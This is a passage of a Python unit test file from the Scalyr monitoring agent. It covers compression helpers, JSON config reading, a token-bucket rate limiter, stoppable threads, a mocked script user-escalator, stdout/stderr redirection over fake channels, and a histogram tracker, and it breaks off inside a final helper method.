util_test.py
# Copyright 2014 Scalyr Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------
#
# author: Steven Czerwinski <czerwin@scalyr.com>
from __future__ import unicode_literals
from __future__ import absolute_import
from scalyr_agent import compat
__author__ = "czerwin@scalyr.com"
from io import open
from scalyr_agent import scalyr_init
scalyr_init()
import sys
import datetime
import os
import tempfile
import threading
import uuid
import mock
from mock import patch, MagicMock
import six
import scalyr_agent.util as scalyr_util
from scalyr_agent.util import (
JsonReadFileException,
RateLimiter,
FakeRunState,
ScriptEscalator,
HistogramTracker,
)
from scalyr_agent.util import (
StoppableThread,
RedirectorServer,
RedirectorClient,
RedirectorError,
)
from scalyr_agent.util import verify_and_get_compress_func
from scalyr_agent.json_lib import JsonObject
from scalyr_agent.test_base import ScalyrTestCase
from scalyr_agent.test_base import skipIf
class TestUtilCompression(ScalyrTestCase):
def setUp(self):
super(TestUtilCompression, self).setUp()
self._data = b"The rain in spain. " * 1000
def test_zlib(self):
"""Successful zlib compression"""
data = self._data
compress = verify_and_get_compress_func("deflate")
self.assertIsNotNone(compress)
import zlib
self.assertEqual(data, zlib.decompress(compress(data)))
def test_bz2(self):
"""Successful bz2 compression"""
data = self._data
compress = verify_and_get_compress_func("bz2")
self.assertIsNotNone(compress)
import bz2
self.assertEqual(data, bz2.decompress(compress(data)))
@skipIf(sys.version_info < (2, 7, 0), "Skipping Python < 2.7")
def test_lz4(self):
data = self._data
compress = verify_and_get_compress_func("lz4")
self.assertIsNotNone(compress)
import lz4.frame as lz4
self.assertEqual(data, lz4.decompress(compress(data)))
@skipIf(sys.version_info < (2, 7, 0), "Skipping Python < 2.7")
def test_zstandard(self):
data = self._data
compress = verify_and_get_compress_func("zstandard")
self.assertIsNotNone(compress)
import zstandard
decompressor = zstandard.ZstdDecompressor()
self.assertEqual(data, decompressor.decompress(compress(data)))
def test_bad_compression_type(self):
"""User enters unsupported compression type"""
self.assertIsNone(verify_and_get_compress_func("bad_compression_type"))
def test_bad_compression_lib_exception_on_import(self):
"""Pretend that import bz2/zlib raises exception"""
def _mock_get_compress_and_decompress_func(
compression_type, compression_level=9
):
raise Exception("Mimic exception when importing compression lib")
@patch(
"scalyr_agent.util.get_compress_and_decompress_func",
new=_mock_get_compress_and_decompress_func,
)
def _test(compression_type):
self.assertIsNone(verify_and_get_compress_func(compression_type))
_test("deflate")
_test("bz2")
_test("lz4")
_test("zstandard")
def test_bad_compression_lib_no_compression(self):
"""Pretend that the zlib/bz2 library compress() method doesn't perform any comnpression"""
def _mock_get_compress_and_decompress_func(
compression_type, compression_level=9
):
m = MagicMock()
# simulate module.compress() method that does not compress input data string
m.compress = lambda data, compression_level=9: data
m.decompress = lambda data: data
return m.compress, m.decompress
@patch(
"scalyr_agent.util.get_compress_and_decompress_func",
new=_mock_get_compress_and_decompress_func,
)
def _test(compression_type):
self.assertIsNone(verify_and_get_compress_func(compression_type))
_test("deflate")
_test("bz2")
_test("lz4")
_test("zstandard")
class TestUtil(ScalyrTestCase):
def setUp(self):
super(TestUtil, self).setUp()
self.__tempdir = tempfile.mkdtemp()
self.__path = os.path.join(self.__tempdir, "testing.json")
def test_read_file_as_json(self):
self.__create_file(self.__path, '{ "a": "hi"}')
value = scalyr_util.read_file_as_json(self.__path)
self.assertEquals(value, {"a": "hi"})
def test_read_config_file_as_json(self):
self.__create_file(self.__path, '{ a: "hi"} // Test')
json_object = scalyr_util.read_config_file_as_json(self.__path)
self.assertEquals(json_object, JsonObject(a="hi"))
def test_read_file_as_json_no_file(self):
self.assertRaises(JsonReadFileException, scalyr_util.read_file_as_json, "foo")
def test_read_file_as_json_with_bad_json(self):
self.__create_file(self.__path, "{ a: hi}")
self.assertRaises(
JsonReadFileException, scalyr_util.read_file_as_json, self.__path
)
def test_read_file_as_json_with_strict_utf8_json(self):
# 2->TODO python3 json libs do not allow serialization with invalid UTF-8.
with open(self.__path, "wb") as f:
f.write(b'{ a: "\x96"}')
self.assertRaises(
JsonReadFileException, scalyr_util.read_file_as_json, self.__path, True
)
def test_atomic_write_dict_as_json_file(self):
info = {"a": "hi"}
scalyr_util.atomic_write_dict_as_json_file(self.__path, self.__path + "~", info)
json_object = scalyr_util.read_file_as_json(self.__path)
self.assertEquals(json_object, info)
def __create_file(self, path, contents):
fp = open(path, "w")
fp.write(contents)
fp.close()
def test_seconds_since_epoch(self):
dt = datetime.datetime(2015, 8, 6, 14, 40, 56)
expected = 1438872056.0
actual = scalyr_util.seconds_since_epoch(dt)
self.assertEquals(expected, actual)
def test_microseconds_since_epoch(self):
dt = datetime.datetime(2015, 8, 6, 14, 40, 56, 123456)
expected = 1438872056123456
actual = scalyr_util.microseconds_since_epoch(dt)
self.assertEquals(expected, actual)
def test_uuid(self):
first = scalyr_util.create_unique_id()
second = scalyr_util.create_unique_id()
self.assertTrue(len(first) > 0)
self.assertTrue(len(second) > 0)
self.assertNotEqual(first, second)
def test_create_uuid3(self):
namespace = uuid.UUID("{aaaaffff-22c7-4d50-92c1-123456781234}")
self.assertEqual(
scalyr_util.create_uuid3(namespace, "test-string"),
uuid.UUID("{72a49a0a-d92e-383c-a88b-2060e372e1af}"),
)
def test_remove_newlines_and_truncate(self):
self.assertEquals(scalyr_util.remove_newlines_and_truncate("hi", 1000), "hi")
self.assertEquals(scalyr_util.remove_newlines_and_truncate("ok then", 2), "ok")
self.assertEquals(
scalyr_util.remove_newlines_and_truncate("o\nk\n", 1000), "o k "
)
self.assertEquals(
scalyr_util.remove_newlines_and_truncate("ok\n\r there", 1000), "ok there"
)
self.assertEquals(
scalyr_util.remove_newlines_and_truncate("ok\n\r there", 6), "ok t"
)
def test_is_list_of_strings_yes(self):
self.assertTrue(scalyr_util.is_list_of_strings(["*", "blah", "dah"]))
def test_is_list_of_strings_no(self):
self.assertFalse(scalyr_util.is_list_of_strings(["*", 3, {"blah": "dah"}]))
def test_is_list_of_strings_none(self):
self.assertFalse(scalyr_util.is_list_of_strings(None))
def test_value_to_bool(self):
self.assertTrue(scalyr_util.value_to_bool(True))
self.assertTrue(scalyr_util.value_to_bool(1))
self.assertFalse(scalyr_util.value_to_bool(0))
self.assertRaises(ValueError, scalyr_util.value_to_bool, 100)
self.assertTrue(scalyr_util.value_to_bool("something"))
self.assertFalse(scalyr_util.value_to_bool("f"))
self.assertFalse(scalyr_util.value_to_bool("False"))
self.assertFalse(scalyr_util.value_to_bool(""))
def test_get_parser_from_config_default(self):
config = {
"something": "something",
"other something": ["thing1", "thing2"],
}
attributes = {"nothing": 0}
self.assertEqual(
scalyr_util.get_parser_from_config(config, attributes, "default_parser"),
"default_parser",
)
def test_get_parser_from_config_hierarchy1(self):
config = {
"something": "something",
"other something": ["thing1", "thing2"],
"parser": "config_parser",
"attributes": {"parser": "config_attributes_parser"},
}
attributes = {
"nothing": 0,
"parser": "attributes_parser",
}
self.assertEqual(
scalyr_util.get_parser_from_config(config, attributes, "default_parser"),
"config_attributes_parser",
)
def test_get_parser_from_config_hierarchy2(self):
config = {
"something": "something",
"other something": ["thing1", "thing2"],
"parser": "config_parser",
"attributes": {},
}
attributes = {
"nothing": 0,
"parser": "attributes_parser",
}
self.assertEqual(
scalyr_util.get_parser_from_config(config, attributes, "default_parser"),
"config_parser",
)
def test_get_parser_from_config_hierarchy3(self):
config = {
"something": "something",
"other something": ["thing1", "thing2"],
"attributes": {},
}
attributes = {
"nothing": 0,
"parser": "attributes_parser",
}
self.assertEqual(
scalyr_util.get_parser_from_config(config, attributes, "default_parser"),
"attributes_parser",
)
def test_get_web_url_from_upload_url(self):
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://agent.scalyr.com"),
"https://www.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://log.scalyr.com"),
"https://www.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://upload.scalyr.com"),
"https://www.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://app.scalyr.com"),
"https://www.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://agent.eu.scalyr.com"),
"https://www.eu.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://log.eu.scalyr.com"),
"https://www.eu.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://upload.eu.scalyr.com"),
"https://www.eu.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://app.eu.scalyr.com"),
"https://www.eu.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://logstaging.scalyr.com"),
"https://logstaging.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://logstaging.eu.scalyr.com"),
"https://logstaging.eu.scalyr.com",
)
class TestRateLimiter(ScalyrTestCase):
def setUp(self):
super(TestRateLimiter, self).setUp()
self.__test_rate = RateLimiter(100, 10, current_time=0)
self.__current_time = 0
self.__last_sleep_amount = -1
def advance_time(self, delta):
self.__current_time += delta
def charge_if_available(self, num_bytes):
return self.__test_rate.charge_if_available(
num_bytes, current_time=self.__current_time
)
def block_until_charge_succeeds(self, num_bytes):
return self.__test_rate.block_until_charge_succeeds(
num_bytes, current_time=self.__current_time
)
def test_basic_use(self):
self.assertTrue(self.charge_if_available(20))
self.assertTrue(self.charge_if_available(80))
self.assertFalse(self.charge_if_available(1))
def test_custom_bucket_size_and_rate(self):
self.__test_rate = RateLimiter(10, 1, current_time=0)
self.assertTrue(self.charge_if_available(10))
self.assertFalse(self.charge_if_available(10))
self.advance_time(1)
self.assertFalse(self.charge_if_available(10))
self.advance_time(5)
self.assertFalse(self.charge_if_available(10))
def test_zero_bucket_fill_rate(self):
self.__test_rate = RateLimiter(100, 0, current_time=0)
self.assertTrue(self.charge_if_available(20))
self.assertTrue(self.charge_if_available(80))
self.assertFalse(self.charge_if_available(1))
self.advance_time(1)
self.assertFalse(self.charge_if_available(20))
self.advance_time(5)
self.assertFalse(self.charge_if_available(20))
def test_refill(self):
self.assertTrue(self.charge_if_available(60))
self.assertFalse(self.charge_if_available(60))
self.advance_time(1)
self.assertFalse(self.charge_if_available(60))
self.advance_time(1)
self.assertTrue(self.charge_if_available(60))
def fake_sleep(self, seconds):
self.__last_sleep_amount = seconds
self.advance_time(seconds)
def test_basic_use_sleep(self):
with mock.patch("scalyr_agent.util.time.sleep", self.fake_sleep):
self.__last_sleep_amount = -1
self.block_until_charge_succeeds(20)
self.assertEqual(self.__last_sleep_amount, -1)
self.block_until_charge_succeeds(80)
self.assertEqual(self.__last_sleep_amount, -1)
self.block_until_charge_succeeds(1)
self.assertEqual(self.__last_sleep_amount, 0.1)
def test_custom_bucket_size_and_rate_sleep(self):
with mock.patch("scalyr_agent.util.time.sleep", self.fake_sleep):
self.__last_sleep_amount = -1
self.__test_rate = RateLimiter(10, 1, current_time=0)
self.block_until_charge_succeeds(10)
self.assertEqual(self.__last_sleep_amount, -1)
self.block_until_charge_succeeds(10)
self.assertEqual(self.__last_sleep_amount, 10)
self.advance_time(15)
self.block_until_charge_succeeds(20)
self.assertEqual(self.__last_sleep_amount, 10)
def test_zero_bucket_fill_rate_sleep(self):
self.__test_rate = RateLimiter(100, 0, current_time=0)
self.assertRaises(ValueError, self.block_until_charge_succeeds, 20)
def test_refill_sleep(self):
with mock.patch("scalyr_agent.util.time.sleep", self.fake_sleep):
self.__last_sleep_amount = -1
self.block_until_charge_succeeds(60)
self.assertEqual(self.__last_sleep_amount, -1)
self.block_until_charge_succeeds(60)
self.assertEqual(self.__last_sleep_amount, 2)
self.advance_time(1)
self.block_until_charge_succeeds(60)
self.assertEqual(self.__last_sleep_amount, 5)
def test_charge_greater_than_bucket_size_sleep(self):
with mock.patch("scalyr_agent.util.time.sleep", self.fake_sleep):
self.__last_sleep_amount = -1
self.__test_rate = RateLimiter(10, 1, current_time=0)
self.block_until_charge_succeeds(20)
self.assertEqual(self.__last_sleep_amount, 10)
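# The sleep amounts asserted above follow token-bucket arithmetic (a
# sketch of the model these tests assume, not necessarily RateLimiter's
# exact implementation): a charge larger than the available tokens
# sleeps (num_bytes - tokens) / fill_rate seconds. With bucket_size=100
# and fill_rate=10, two charges of 60 leave the second one short 20
# tokens, hence the asserted 20 / 10 = 2.0 second sleep.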
class TestRunState(ScalyrTestCase):
def test_basic_use(self):
# We use a FakeRunState for testing just so we do not accidentally sleep.
run_state = FakeRunState()
self.assertTrue(run_state.is_running())
run_state.sleep_but_awaken_if_stopped(1.0)
self.assertEquals(run_state.total_times_slept, 1)
run_state.stop()
self.assertFalse(run_state.is_running())
def test_sleeping_already_stopped(self):
run_state = FakeRunState()
run_state.stop()
run_state.sleep_but_awaken_if_stopped(1.0)
self.assertEquals(run_state.total_times_slept, 0)
def test_callbacks(self):
self.called = False
def on_stop():
self.called = True
run_state = FakeRunState()
run_state.register_on_stop_callback(on_stop)
run_state.stop()
self.assertTrue(self.called)
# Make sure it is immediately invoked if already stopped.
self.called = False
run_state.register_on_stop_callback(on_stop)
self.assertTrue(self.called)
class TestStoppableThread(ScalyrTestCase):
def setUp(self):
super(TestStoppableThread, self).setUp()
self._run_counter = 0
def test_basic_use(self):
# Since the ScalyrTestCase sets the name prefix, we need to set it back to None to get an unmolested name.
StoppableThread.set_name_prefix(None)
test_thread = StoppableThread("Testing", self._run_method)
self.assertEqual(test_thread.getName(), "Testing")
test_thread.start()
test_thread.stop()
self.assertTrue(self._run_counter > 0)
def test_name_prefix(self):
StoppableThread.set_name_prefix("test_name_prefix: ")
test_thread = StoppableThread("Testing", self._run_method)
self.assertEqual(test_thread.getName(), "test_name_prefix: Testing")
test_thread.start()
test_thread.stop()
self.assertTrue(self._run_counter > 0)
def test_name_prefix_with_none(self):
StoppableThread.set_name_prefix("test_name_prefix: ")
test_thread = StoppableThread(target=self._run_method)
self.assertEqual(test_thread.getName(), "test_name_prefix: ")
test_thread.start()
test_thread.stop()
self.assertTrue(self._run_counter > 0)
def test_basic_extending(self):
class TestThread(StoppableThread):
def __init__(self):
self.run_counter = 0
StoppableThread.__init__(self, "Test thread")
def run_and_propagate(self):
self.run_counter += 1
while self._run_state.is_running():
self.run_counter += 1
self._run_state.sleep_but_awaken_if_stopped(0.03)
test_thread = TestThread()
test_thread.start()
test_thread.stop()
self.assertTrue(test_thread.run_counter > 0)
def test_exception(self):
class TestException(Exception):
pass
def throw_an_exception(run_state):
run_state.is_running()
raise TestException()
test_thread = StoppableThread("Testing", throw_an_exception)
test_thread.start()
caught_it = False
try:
test_thread.stop()
except TestException:
caught_it = True
self.assertTrue(caught_it)
def test_is_alive(self):
class TestThread(StoppableThread):
def __init__(self):
self.run_counter = 0
StoppableThread.__init__(self, "Test thread")
def run_and_propagate(self):
while self._run_state.is_running():
self._run_state.sleep_but_awaken_if_stopped(0.03)
test_thread_1 = TestThread()
test_thread_2 = StoppableThread("Testing", self._run_method)
test_threads = [test_thread_1, test_thread_2]
for test_thread in test_threads:
self.assertFalse(test_thread.isAlive())
if six.PY3:
self.assertFalse(test_thread.is_alive())
test_thread.start()
self.assertTrue(test_thread.isAlive())
if six.PY3:
self.assertTrue(test_thread.is_alive())
test_thread.stop()
self.assertFalse(test_thread.isAlive())
if six.PY3:
self.assertFalse(test_thread.is_alive())
def _run_method(self, run_state):
self._run_counter += 1
while run_state.is_running():
self._run_counter += 1
run_state.sleep_but_awaken_if_stopped(0.03)
def test_register_on_stop_callback(self):
self.callback_called = False
def fake_callback():
self.callback_called = True
run_state = scalyr_util.RunState()
run_state.register_on_stop_callback(fake_callback)
run_state.stop()
self.assertTrue(self.callback_called)
def test_remove_on_stop_callback(self):
self.callback_called = False
def fake_callback():
self.callback_called = True
run_state = scalyr_util.RunState()
run_state.register_on_stop_callback(fake_callback)
run_state.remove_on_stop_callback(fake_callback)
run_state.stop()
self.assertFalse(self.callback_called)
class TestScriptEscalator(ScalyrTestCase):
def tearDown(self):
super(TestScriptEscalator, self).tearDown()
if "__main__" in sys.modules:
del sys.modules["__main__"]
def test_is_user_change_required(self):
(test_instance, controller) = self.create_instance("czerwin", "fileA", "steve")
self.assertTrue(test_instance.is_user_change_required())
(test_instance, controller) = self.create_instance(
"czerwin", "fileA", "czerwin"
)
self.assertFalse(test_instance.is_user_change_required())
def test_change_user_and_rerun_script(self):
        # NOTE: __main__.__file__ might not be set when running tests under pytest or nose
mock_main = mock.Mock()
mock_main.__file__ = "/tmp/file.py"
sys.modules["__main__"] = mock_main
(test_instance, controller) = self.create_instance("czerwin", "fileA", "steve")
self.assertEquals(test_instance.change_user_and_rerun_script("random"), 0)
self.assertEquals(controller.call_count, 1)
self.assertEquals(controller.last_call["user"], "steve")
self.assertEqual(controller.last_call["script_file"], "/tmp/file.py")
def create_instance(self, current_user, config_file, config_owner):
controller = TestScriptEscalator.ControllerMock(
current_user, config_file, config_owner
)
# noinspection PyTypeChecker
return ScriptEscalator(controller, config_file, os.getcwd()), controller
class ControllerMock(object):
def __init__(self, running_user, expected_config_file, config_owner):
self.__running_user = running_user
self.__expected_config_file = expected_config_file
self.__config_owner = config_owner
self.last_call = None
self.call_count = 0
def get_current_user(self):
return self.__running_user
def get_file_owner(self, config_file_path):
assert self.__expected_config_file == config_file_path
if self.__expected_config_file == config_file_path:
return self.__config_owner
else:
return None
def run_as_user(self, user, script_file_path, script_binary, script_args):
self.call_count += 1
self.last_call = {
"user": user,
"script_file": script_file_path,
"script_binary": script_binary,
"script_args": script_args,
}
return 0
class TestRedirectorServer(ScalyrTestCase):
"""Tests the RedirectorServer code using fakes for stdout, stderr and the channel.
"""
def setUp(self):
super(TestRedirectorServer, self).setUp()
# Allows us to watch what bytes are being sent to the client.
self._channel = FakeServerChannel()
# Allows us to write bytes to stdout, stderr without them going to the terminal.
self._sys = FakeSys()
self._server = RedirectorServer(self._channel, sys_impl=self._sys)
def test_sending_str(self):
self._server.start()
# Verify that the server told the channel to accept the next client connection.
self.assertEquals(self._channel.accept_count, 1)
# Simulate writing to stdout.
self._sys.stdout.write("Testing")
# Make sure we wrote a message to the channel
self.assertEquals(self._channel.write_count, 1)
(stream_id, content) = self._parse_sent_bytes(self._channel.last_write)
self.assertEquals(stream_id, 0)
self.assertEquals(content, "Testing")
def test_sending_unicode(self):
self._server.start()
self.assertEquals(self._channel.accept_count, 1)
self._sys.stdout.write("caf\xe9")
self.assertEquals(self._channel.write_count, 1)
(stream_id, content) = self._parse_sent_bytes(self._channel.last_write)
self.assertEquals(stream_id, 0)
self.assertEquals(content, "caf\xe9")
def test_sending_to_stderr(self):
self._server.start()
self.assertEquals(self._channel.accept_count, 1)
self._sys.stderr.write("Testing again")
self.assertEquals(self._channel.write_count, 1)
(stream_id, content) = self._parse_sent_bytes(self._channel.last_write)
self.assertEquals(stream_id, 1)
self.assertEquals(content, "Testing again")
def test_connection_failure(self):
# Set the channel to simulate a connection timeout.
self._channel.timeout_connection = True
caught_it = False
try:
# Make sure that we get an exception.
self._server.start()
except RedirectorError:
caught_it = True
self.assertTrue(caught_it)
def _parse_sent_bytes(self, content):
"""Parses the stream id and the actual content from the encoded content string sent by the server.
@param content: The string sent by the server.
@type content: six.binary_type
@return: A tuple of the stream_id and the actual content encoded in the sent string.
@rtype: (int,six.text_type)
"""
prefix_code = content[0:4]
# 2->TODO struct.pack|unpack in python < 2.7.7 does not allow unicode format string.
code = compat.struct_unpack_unicode("i", prefix_code)[0]
stream_id = code % 2
num_bytes = code >> 1
self.assertEquals(len(content), num_bytes + 4)
decoded_str = content[4:].decode("utf-8")
return stream_id, decoded_str
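# A minimal sketch of the framing assumed by these tests (mirroring
# _parse_sent_bytes above and _send_to_client below): the 4-byte prefix
# packs the payload length and the stream id (0 = stdout, 1 = stderr)
# into one native-endian int as length * 2 + stream_id.
def _frame_example():
    import struct
    payload = "Testing".encode("utf-8")
    code = len(payload) * 2 + 0  # stream id 0 -> stdout
    frame = struct.pack("i", code) + payload
    decoded = struct.unpack("i", frame[0:4])[0]
    assert decoded % 2 == 0 and decoded >> 1 == len(payload)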
class TestRedirectorClient(ScalyrTestCase):
"""Test the RedirectorClient by faking out the client channel and also the clock.
"""
def setUp(self):
super(TestRedirectorClient, self).setUp()
self._fake_sys = FakeSys()
# Since the client is an actual other thread that blocks waiting for input from the server, we have to
        # simulate the time using a fake clock. That will allow us to wake up the client thread from time to time.
self._fake_clock = scalyr_util.FakeClock()
# The fake channel allows us to insert bytes being sent by the server.
self._client_channel = FakeClientChannel(self._fake_clock)
self._client = RedirectorClient(
self._client_channel, sys_impl=self._fake_sys, fake_clock=self._fake_clock
)
self._client.start()
# Wait until the client thread begins to block for the initial accept from the server.
self._fake_clock.block_until_n_waiting_threads(1)
def tearDown(self):
if self._client is not None:
self._client.stop(wait_on_join=False)
self._fake_clock.advance_time(set_to=59.0)
self._client.join()
def test_receiving_bytes(self):
# Simulate accepting the connection.
self._accept_client_connection()
self._send_to_client(0, "Testing")
# Wait until have bytes written to stdout by the client thread.
self._fake_sys.stdout.wait_for_bytes(1.0)
self.assertEquals(self._fake_sys.stdout.last_write, "Testing")
def test_receiving_unicode(self):
self._accept_client_connection()
self._send_to_client(0, "caf\xe9")
self._fake_sys.stdout.wait_for_bytes(1.0)
self.assertEquals(self._fake_sys.stdout.last_write, "caf\xe9")
def test_connection_timeout(self):
# We advance the time past 60 seconds which is the connection time out.
self._fake_clock.advance_time(set_to=61.0)
got_it = False
try:
# Even though we have not called stop on the thread or the server hasn't closed the connection,
# we should still see the client thread terminate because of the exception it raises.
self._client.join()
except RedirectorError:
got_it = True
self._client = None
self.assertTrue(got_it)
def test_close_from_server(self):
self._accept_client_connection()
self._send_to_client(-1, "")
# Even though we haven't called stop on the client thread, it should still end because the server sent
# the signal to stop/close.
self._client.join()
self._client = None
def test_stopped_during_connection(self):
self._client.stop(wait_on_join=False)
        # We have to wake all threads so the client thread will notice it has been stopped.
self._fake_clock.wake_all_threads()
self._client.join()
self._client = None
def test_stopped_during_reading(self):
self._accept_client_connection()
self._client.stop(wait_on_join=False)
        # We have to wake all threads so the client thread will notice it has been stopped.
self._fake_clock.wake_all_threads()
self._client.join()
self._client = None
def _accept_client_connection(self):
self._client_channel.simulate_server_connect()
def _send_to_client(self, stream_id, content):
if type(content) is six.text_type:
encoded_content = six.text_type(content).encode("utf-8")
else:
encoded_content = content
code = len(encoded_content) * 2 + stream_id
# 2->TODO struct.pack|unpack in python < 2.7.7 does not allow unicode format string.
self._client_channel.simulate_server_write(
compat.struct_pack_unicode("i", code) + encoded_content
)
class TestRedirectionService(ScalyrTestCase):
"""Tests both the RedirectorServer and the RedirectorClient communicating together.
"""
def setUp(self):
super(TestRedirectionService, self).setUp()
self._client_sys = FakeSys()
self._server_sys = FakeSys()
self._fake_clock = scalyr_util.FakeClock()
self._client_channel = FakeClientChannel(self._fake_clock)
self._server_channel = FakeServerChannel(self._client_channel)
self._client = RedirectorClient(
self._client_channel, sys_impl=self._client_sys, fake_clock=self._fake_clock
)
self._server = RedirectorServer(self._server_channel, sys_impl=self._server_sys)
self._client.start()
self._server.start()
def test_end_to_end(self):
self._server_sys.stdout.write("Test full")
self._server.stop()
self._client.stop()
class FakeServerChannel(RedirectorServer.ServerChannel):
"""A mock-like object for the ServerChannel that allows us to see if certain methods were invoked and with
what arguments.
"""
def __init__(self, client_channel=None):
# Gives the counts of the various methods.
self.close_count = 0
self.accept_count = 0
self.write_count = 0
# The last string that was used when invoking `write`.
self.last_write = None
# If set to True, when the server invokes `accept_client`, it will simulate a connection timeout.
self.timeout_connection = False
# If not None, the fake client channel to send the bytes from `write`.
self._client_channel = client_channel
def accept_client(self, timeout=None):
self.accept_count += 1
if not self.timeout_connection and self._client_channel is not None:
self._client_channel.simulate_server_connect()
return not self.timeout_connection
def write(self, content):
self.write_count += 1
self.last_write = content
if self._client_channel is not None:
self._client_channel.simulate_server_write(content)
def close(self):
self.close_count += 1
class FakeClientChannel(object):
"""Fakes out the RedirectorClient.ClientChannel interface.
This allows us to simulate the connection being accepted by the server and bytes being sent by the server.
"""
def __init__(self, fake_clock):
self._lock = threading.Lock()
self._allow_connection = False
self._pending_content = b""
self._fake_clock = fake_clock
def connect(self):
self._lock.acquire()
result = self._allow_connection
self._lock.release()
return result
def peek(self):
self._lock.acquire()
if self._pending_content is not None:
bytes_to_read = len(self._pending_content)
else:
bytes_to_read = 0
self._lock.release()
return bytes_to_read, 0
def read(self, num_bytes_to_read):
self._lock.acquire()
assert num_bytes_to_read <= len(self._pending_content)
result = self._pending_content[0:num_bytes_to_read]
self._pending_content = self._pending_content[num_bytes_to_read:]
self._lock.release()
return result
def close(self):
pass
def simulate_server_connect(self):
self._lock.acquire()
self._allow_connection = True
self._lock.release()
self._simulate_busy_loop_advance()
def simulate_server_write(self, content):
self._lock.acquire()
self._pending_content = b"%s%s" % (self._pending_content, content)
self._lock.release()
self._simulate_busy_loop_advance()
def _simulate_busy_loop_advance(self):
self._fake_clock.advance_time(increment_by=0.4)
class FakeSys(object):
def __init__(self):
self.stdout = FakeSys.FakeFile()
self.stderr = FakeSys.FakeFile()
class FakeFile(object):
def __init__(self):
self._condition = threading.Condition()
self._last_write = None
def write(self, content):
self._condition.acquire()
self._last_write = content
self._condition.notifyAll()
self._condition.release()
@property
def last_write(self):
self._condition.acquire()
result = self._last_write
self._condition.release()
return result
def wait_for_bytes(self, timeout):
self._condition.acquire()
try:
if self._last_write is not None:
return
self._condition.wait(timeout)
finally:
self._condition.release()
class TestHistogramTracker(ScalyrTestCase):
"""Tests the HistogramTracker abstraction.
"""
def setUp(self):
super(TestHistogramTracker, self).setUp()
self._testing = HistogramTracker([10, 25, 50, 100])
def test_count(self):
self.assertEqual(self._testing.count(), 0)
self._testing.add_sample(1)
self._testing.add_sample(11)
self.assertEqual(self._testing.count(), 2)
self._testing.reset()
self.assertEqual(self._testing.count(), 0)
def test_average(self):
self._testing.add_sample(1)
self._testing.add_sample(11)
self.assertAlmostEqual(self._testing.average(), 6.0)
self._testing.reset()
self.assertIsNone(self._testing.average())
self._testing.add_sample(6)
self.assertAlmostEqual(self._testing.average(), 6.0)
def test_min(self):
self._testing.add_sample(1)
self._testing.add_sample(11)
self.assertAlmostEqual(self._testing.min(), 1.0)
self._testing.add_sample(15)
self.assertAlmostEqual(self._testing.min(), 1.0)
self._testing.add_sample(0.5)
self.assertAlmostEqual(self._testing.min(), 0.5)
self._testing.reset()
self.assertIsNone(self._testing.min())
self._testing.add_sample(15)
self.assertAlmostEqual(self._testing.min(), 15.0)
def test_max(self):
self._testing.add_sample(1)
self._testing.add_sample(11)
self.assertAlmostEqual(self._testing.max(), 11.0)
self._testing.add_sample(15)
self.assertAlmostEqual(self._testing.max(), 15.0)
self._testing.add_sample(0.5)
self.assertAlmostEqual(self._testing.max(), 15.0)
self._testing.reset()
self.assertIsNone(self._testing.max())
self._testing.add_sample(0)
self.assertAlmostEqual(self._testing.max(), 0)
def test_buckets(self):
buckets = self._buckets_to_list()
self.assertEqual(len(buckets), 0)
self._testing.add_sample(2)
buckets = self._buckets_to_list()
self.assertEqual(len(buckets), 1)
self.assertBucketEquals(buckets[0], (1, 2, 10))
self._testing.add_sample(50)
buckets = self._buckets_to_list()
self.assertEqual(len(buckets), 2)
self.assertBucketEquals(buckets[0], (1, 2, 10))
self.assertBucketEquals(buckets[1], (1, 50, 100))
self._testing.add_sample(5)
buckets = self._buckets_to_list()
self.assertEqual(len(buckets), 2)
self.assertBucketEquals(buckets[0], (2, 2, 10))
self.assertBucketEquals(buckets[1], (1, 50, 100))
self._testing.add_sample(200)
buckets = self._buckets_to_list()
self.assertEqual(len(buckets), 3)
self.assertBucketEquals(buckets[0], (2, 2, 10))
self.assertBucketEquals(buckets[1], (1, 50, 100))
self.assertBucketEquals(buckets[2], (1, 100, 200.01))
def test_estimate_percentile(self):
self.assertIsNone(self._testing.estimate_median())
self._testing.add_sample(0)
self._testing.add_sample(3)
self._testing.add_sample(4)
# Since all of the values fall into the first bucket, the estimate of the percentile will be the same for all
# percentiles.
self.assertAlmostEqual(self._testing.estimate_percentile(0.1), 5.0)
self.assertAlmostEqual(self._testing.estimate_percentile(0.5), 5.0)
self.assertAlmostEqual(self._testing.estimate_percentile(1.0), 5.0)
self._testing.add_sample(11)
self._testing.add_sample(12)
self._testing.add_sample(13)
self._testing.add_sample(55)
self.assertAlmostEqual(self._testing.estimate_percentile(0.1), 5.0)
self.assertAlmostEqual(self._testing.estimate_percentile(0.5), 17.5)
self.assertAlmostEqual(self._testing.estimate_percentile(1.0), 75.0)
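        # The expected values are bucket midpoints: with boundaries
        # [10, 25, 50, 100], the median sample sits in [10, 25) -> 17.5
        # and the top sample in [50, 100) -> 75.0. (Midpoint estimation
        # is inferred from these assertions, not from HistogramTracker
        # internals.)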
def test_summarize(self):
self.assertEqual(self._testing.summarize(), "(count=0)")
self._testing.add_sample(2)
self._testing.add_sample(4)
self._testing.add_sample(45)
self._testing.add_sample(200)
self.assertEqual(
self._testing.summarize(),
"(count=4,avg=62.75,min=2.00,max=200.00,median=6.00)",
)
def assertBucketEquals(self, first, second):
self.assertEquals(first[0], second[0], msg="The counts do not equal")
self.assertAlmostEquals(
first[1], second[1], msg="The lower bounds do not equal"
)
self.assertAlmostEquals(
first[2], second[2], msg="The upper bounds do not equal"
)
def _buckets_to_list(self):
result = []
for count, lower, upper in self._testing.buckets():
